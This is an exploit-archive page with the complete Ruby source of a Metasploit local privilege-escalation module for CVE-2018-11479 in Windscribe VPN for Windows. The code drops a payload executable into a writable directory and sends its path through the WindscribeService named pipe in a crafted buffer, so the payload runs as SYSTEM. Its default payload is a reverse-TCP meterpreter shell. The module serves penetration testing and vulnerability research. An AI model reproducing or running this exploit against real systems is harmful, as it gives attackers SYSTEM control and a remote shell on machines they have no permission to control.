exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windscribe WindscribeService Named Pipe Privilege Escalation

Windscribe WindscribeService Named Pipe Privilege Escalation
Posted Feb 5, 2020
Authored by Brendan Coles, Emin Ghuliev | Site metasploit.com

The Windscribe VPN client application for Windows makes use of a Windows service WindscribeService.exe which exposes a named pipe \\.\pipe\WindscribeService allowing execution of programs with elevated privileges. Windscribe versions prior to 1.82 do not validate user-supplied program names, allowing execution of arbitrary commands as SYSTEM. This Metasploit module has been tested successfully on Windscribe versions 1.80 and 1.81 on Windows 7 SP1 (x64).

tags | exploit, arbitrary
systems | windows
advisories | CVE-2018-11479
SHA-256 | 7f200c24f141392d23225b9330afb247d5a945ace30e10996f31e175ed2e9dc9

Windscribe WindscribeService Named Pipe Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Exploit::EXE
include Post::File
include Post::Windows::Priv
include Post::Windows::Services
include Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
'Description' => %q{
The Windscribe VPN client application for Windows makes use of a
Windows service `WindscribeService.exe` which exposes a named pipe
`\\.\pipe\WindscribeService` allowing execution of programs with
elevated privileges.

Windscribe versions prior to 1.82 do not validate user-supplied
program names, allowing execution of arbitrary commands as SYSTEM.

This module has been tested successfully on Windscribe versions
1.80 and 1.81 on Windows 7 SP1 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Emin Ghuliev', # Discovery and exploit
'bcoles' # Metasploit
],
'References' =>
[
['CVE', '2018-11479'],
['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'],
['URL', 'https://pastebin.com/eLG3dpYK']
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2018-05-24',
'DefaultOptions' =>
{
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
},
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0))
register_advanced_options [
OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
]
end

def base_dir
datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
end

def service_exists?(service)
srv_info = service_info(service)

if srv_info.nil?
vprint_warning 'Unable to enumerate Windows services'
return false
end

if srv_info && srv_info[:display].empty?
return false
end

true
end

def write_named_pipe(pipe, command)
kt = "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
kt << "\x00\x00\x00\x00"
kt << [command.force_encoding('UTF-8').codepoints.map { |c| "%04X" % c }.join].pack('H*')
kt << "\x00" * (32_005 - kt.length)

print_status "Sending #{command} to #{pipe} ..."

r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, nil)
handle = r['return']

if handle == 0xffffffff # INVALID_HANDLE_VALUE
print_error "Invalid handle. #{pipe} named pipe not found, or already opened"
return false
end

vprint_good("Opended #{pipe}! Proceeding ...")

begin
w = client.railgun.kernel32.WriteFile(handle, kt, kt.length, 4, nil)
if w['return'] == false
return false
end
ensure
session.railgun.kernel32.CloseHandle(handle)
end

true
rescue
false
end

def check
service = 'WindscribeService'

unless service_exists? service
return CheckCode::Safe("Service '#{service}' does not exist")
end

CheckCode::Detected
end

def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end

if is_system?
fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
end

payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
payload_exe = generate_payload_exe
vprint_status "Writing payload (#{payload.encoded.length} bytes) to #{payload_path} ..."
write_file payload_path, payload_exe
register_file_for_cleanup payload_path

unless write_named_pipe("\\\\.\\pipe\\WindscribeService", payload_path)
fail_with Failure::Unknown, 'Failed to write to pipe'
end
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close